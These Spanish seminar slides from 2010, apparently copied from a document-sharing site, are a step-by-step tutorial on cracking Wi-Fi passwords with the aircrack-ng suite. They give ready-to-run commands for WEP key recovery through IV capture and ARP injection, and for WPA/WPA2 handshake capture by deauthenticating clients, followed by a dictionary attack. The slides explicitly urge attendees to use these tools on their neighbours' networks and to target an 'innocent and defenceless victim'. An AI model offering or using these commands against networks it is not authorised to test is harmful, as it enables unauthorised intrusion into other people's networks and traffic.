Вы находитесь на странице: 1из 33

30 de Septiembre de 2010

Seminario de Tendencias y Evolución


de las Tecnologías de la Información y
Comunicaciones en Chile
Paulo Colomés F.
Docente Universidad Tecnológica de Chile Inacap
Instructor CCNA CCAI Cisco Networking Academy
www.redescisco.net
Objetivos
•Identificar las vulnerabilidades actuales de las
redes inalámbricas

•Describir los pasos para lograr obtener una


contraseña inalámbrica WEP

•Intentar obtener una contraseña WEP de una


red inalámbrica

•Ofrecerles las herramientas para que ustedes


mismos jueguen con las redes Wi-Fi (de sus
vecinos)
¿Seguridad en redes inalámbricas?
¿Seguridad en redes inalámbricas?
WPA2-AES/TKIP
WPA2-PSK
WPA-PSK
WEP 128
WEP 64
MAC Auth
Sin Seguridad
¿Seguridad en redes inalámbricas?
WPA2-AES
WPA2-TKIP
WPA-PSK
AQUÍ
WEP 128
ATACAMOS! WEP 64

MAC Auth
Sin Seguridad
Algo de lenguaje…
-- WEP = Wired Equivalent Privacy
-- WPA (No WAP) = WiFi Protected
Access
-- El verbo “encriptar” en español
no existe, ni menos
“desencriptar” ni ningún derivado.
El término correcto es “cifrar”y
“descifrar”
Nuestro Kit de Herramientas
•Tarjeta inalámbrica decente
•Sistema operativo Unix
•Drivers parchados para inyectar tráfico en la red
•Airodump-ng
•Aireplay-ng
•Wesside-ng (Opcional)
•Aircrack-ng

•Opcionales:
•Kismet
•Hydra
•Airsniff
•….otros
Sistema Operativo Unix
•FreeBSD
•OpenBSD
•NetBSD
•Solaris
•Mac OSX
•Linux
O algunos Linux previamente especializados en esta materia:

• Backtrack 4
• Wifiway
• Wifislax
Ahora… a lo que vinimos
Pasos para obtener una contraseña WEP
1. Configurar la tarjeta de red en modo monitor (promisc)
2. Escanear el aire en búsqueda de una red inalámbrica
interesante
3. Identificar una víctima inocente e indefensa
4. Comenzar a obtener tramas que contengan información
WEP y almacenarlas en un archivo.
5. Si la víctima se resiste, inyectarle tráfico para generar
respuestas vulnerables
6. Crackear la contraseña WEP
7. Conectarse y ser feliz 
¿Por qué es posible romper claves
WEP?
1. WEP se basa en el algoritmo
criptográfico RC4 el cual es
conocido por sus
vulnerabilidades.

2. WEP envía parte de su tráfico sin


cifrar lo que permite capturar IVs
(Vectores de Inicialización)
Pasos para obtener una contraseña WEP
1. Configurar la tarjeta de red en modo monitor (promisc)

root@hacker:~# airmon-ng start wlan0


root@hacker:~# iwconfig
Pasos para obtener una contraseña WEP
2. Escanear el aire en búsqueda de una víctima

root@hacker:~# airodump-ng wlan0


Pasos para obtener una contraseña WEP
3. Una vez seleccionada la víctima capturamos los paquetes
de tráfico que contengan IV’s válidos.

root@hacker:~#
airodump-ng –c 1 –w intento1 - -bssid 00:11:22:33:44:55 mon0

Donde:
-c = Canal donde se encuentra la víctima (del 1 al 14)
-w = Nombre con el que se guardará el archivo de capturas (.cap)
- - bssid = Dirección MAC del Access Point que queremos crackear
Pasos para obtener una contraseña WEP
4. Esperar que se junten al menos 20.000 IV’s (Indicados en la
columna #Data). Como esto puede tomarnos mucho
tiempo, sobre todo si no hay tráfico entre algún cliente
válido y el AP, debemos entonces acelerar ese proceso. En
un nuevo terminal ejecutar:

root@hacker:~#
aireplay-ng -1 0 –a 00:11:22:33:44:55 -e Hackme mon0

Donde:
-a = Dirección MAC del Access Point que queremos crackear.
-e = Nombre de la red (SSID) que queremos creackear.
Pasos para obtener una contraseña WEP

Se debe obtener un mensaje


“Association Successful =) (AID: 1)”
Pasos para obtener una contraseña WEP
5. Inyectar tráfico ARP para acelerar la respuesta (ARP
Replies) desde el Access Point que contenga IV Válidos
para poder crackear.

root@hacker:~#
aireplay-ng -3 -b 00:11:22:33:44:55 mon0
Pasos para obtener una contraseña WEP

Esperar que los IV’s del Airodump


iniciado en el paso N° 3 lleguen a los
100.000, aunque con 20.000 es posible
romper claves en ciertos casos.
Pasos para obtener una contraseña WEP
6. Cuando se tengan suficientes IV’s se puede lanzar el
programa AirCrack sobre el archivo .cap almacenado
anteriormente.

root@hacker:~# aircrack intento1-01.cap


Pasos para obtener una contraseña WEP
Pasos para obtener una contraseña WEP
6. Una vez que se tenga la clave de la red Wireless, solo
queda conectarse mediante un gestor gráfico o mediante
comandos.

iwconfig wlan0 mode managed


iwconfig wlan0 key s:admin
iwconfig wlan0 essid “Hackme”
dhclient wlan0
ping www.google.cl
¿Preguntas, dudas, algo que
compartir?
¿Y las claves WPA/WPA2?

Aunque WPA se basa en el mismo algoritmo que WEP (RC4), esta es más
segura por ahora para redes inalámbricas y no es posible directamente
crackear una contraseña WPA usando el mismo método que WEP. Lo que sí
se puede hacer es lanzar un ataque de diccionario (no de fuerza bruta) contra
esa red. Si la contraseña es básica, la podemos sacar.

Esto solo funciona si es que hay algún cliente ya conectado a la red.


Atacar WPA consiste en desconectar al cliente y capturar los handshakes
de autenticación.
¿Y las claves WPA/WPA2?
1. Capturar Handshakes
# airodump-ng –c 1 –w intento1 - -bssid 00:11:22:33:44:55 mon0
2. Forzar a un cliente a reconectarse a la red
# aireplay -0 5 -a 00:11:22:33:44:55 -c <MAC_CLIENTE> mon0
3. Una vez que se tengan los handshakes, correrle un ataque de
diccionario.
# aircrack –a 2 –b 00:11:22:33:44:55 –w /ruta/al/wordlist.txt

Donde - -bssid, -a y –b es la MAC de del Access Point víctima


Muchas gracias.
Paulo Colomés F.
www.redescisco.net
Septiembre 2010

Вам также может понравиться